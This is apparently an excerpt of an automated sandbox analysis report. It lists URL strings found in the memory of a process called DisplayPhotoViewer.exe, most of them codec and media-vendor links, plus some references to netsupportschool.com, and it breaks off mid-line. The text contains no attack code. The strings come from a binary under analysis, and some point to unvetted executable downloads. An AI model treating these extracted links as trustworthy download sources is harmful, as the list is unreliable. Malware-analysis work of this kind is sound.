Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;RGBA;4:4:4:4
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;YUV;4:2:2
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://video.google.com/playerdownload.html
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://wiki.hydrogenaudio.org/index.php?title=Recommended_Ogg_Vorbis
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://winace.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://winamp.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://winzip.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://world.casio.com/;Casio
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.3gpp.org/;3GPP
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.3gpp2.org/;3GPP2
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.3ivx.com/download/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.3ivx.com/download/;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.adobe.fr/products/encore/;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.aiim.org/pdfa/ns/id/pdfaid:partpdfaid:conformance
Source: DisplayPhotoViewer.exe, 00000006.00000002.3232657595.000000006B2DB000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/appletv/;Apple
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/iphone/;Apple
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/itunes/;AES
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/itunes/;Apple
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;422
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;422;;YUV;4:2:2
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;4444
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;4444;;;4:4:4
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;;4:4:4
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;RGB
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV;4:2:2
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Adobe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Base
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Facebook
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;High;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;ISML
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;ISO
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;JVT
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;LT;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Mobile
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Narrow
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Normal;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;PIFF
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Proxy;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;QuickTime
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Quicktime
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;RAW
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;RAW;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Wide
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.array.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.array.com;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.autodesk.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.avs.org.cn/;Lossy
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.bbc.co.uk/rd/projects/dirac/index.shtml;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.bitjazz.com/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.blender3d.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.chem.nott.ac.uk/flc.html;Lossy
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.chiariglione.org/mpeg/technologies/mp04-sls/index.htm;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cineform.com/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cineform.com/products/ConnectHD.htm
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cineform.com/products/ConnectHD.htm;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cineform.com/products/ConnectHD.htm;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cinepak.com/text.html
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cinepak.com/text.html;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cpcweb.com/Captioning/cap_software.htm;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cyberlink.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.cyberlink.com;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.digicine.com/PROTO-ASDCP-AM-20040311#
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.digicine.com/PROTO-ASDCP-AM-20040311#http://www.smpte-ra.org/schemas/429-9/2007/AMAssetMa
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.digicine.com/PROTO-ASDCP-CPL-20040511#
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.digicine.com/PROTO-ASDCP-PKL-20040311#
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.digicine.com/PROTO-ASDCP-PKL-20040311#http://www.smpte-ra.org/schemas/429-8/2007/PKLhttp:
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.digitalvoodoo.net/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.divx.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.divx.com;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.divxity.com/download/ap4v1-702.exe
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.divxity.com/download/ap4v1-702.exe;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.dolby.com/consumer/technology/trueHD.html
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.dts.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ebu.ch/metadata/schemas/EBUCore/20140318/EBU_CORE_20140318.xsd
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexrgb.htm
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB;;4
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB;;8
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGBA
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexyuv.htm
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexyuv.htm;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;4:1:1
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;4:2:2
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fraps.com/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.fraps.com/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.geovision.com.tw/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.gotomeeting.com/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.gotomeeting.com/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ii.uj.edu.pl/~jezabek/blox/blox-0.1.0b.zip
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ii.uj.edu.pl/~jezabek/blox/blox-0.1.0b.zip;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.iis.fraunhofer.de/amm/index.html
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.iis.fraunhofer.de/amm/index.html;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.iis.fraunhofer.de/amm/index.html;;Version
Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.00000000029F4000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.indyproject.org/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.intel.com/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.isky.co.kr/html/cs/download.jsp
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.iso.org/;JPEG
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.iso.org/;Motion
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.itu.int
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.itu.int/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ligos.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.linek.sk/mlc/;;;;;;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.loc.gov/mix/v20
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.loc.gov/mix/v20xmlns:mixhttp://www.loc.gov/mix/v20
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.loc.gov/standards/mix/mix20/mix20.xsd
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.loc.gov/standards/mix/mix20/mix20.xsdmix:numeratormix:denominatormix:Extension
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.loronix.com/products/video_clips/wavecodec.asp
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.loronix.com/products/video_clips/wavecodec.asp;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.lossless-audio.com/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.lossless-audio.com/;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.lucasarts.com/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.lucasarts.com/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.matrox.com/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.meridian-audio.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.monkeysaudio.com/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.monkeysaudio.com/;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.morgan-multimedia.com/JPEG
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.msoftware.co.nz
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.musepack.net;Lossy
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.nellymoser.com/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.nero.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.nero.com;;;YUV;4:2:0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.nerodigital.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.nerodigital.com;Nero
Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp118
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2952270350.000000000C2FE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2622099264.000000000A539000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2620711515.000000000A539000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951583851.000000000A727000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951583851.000000000A742000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 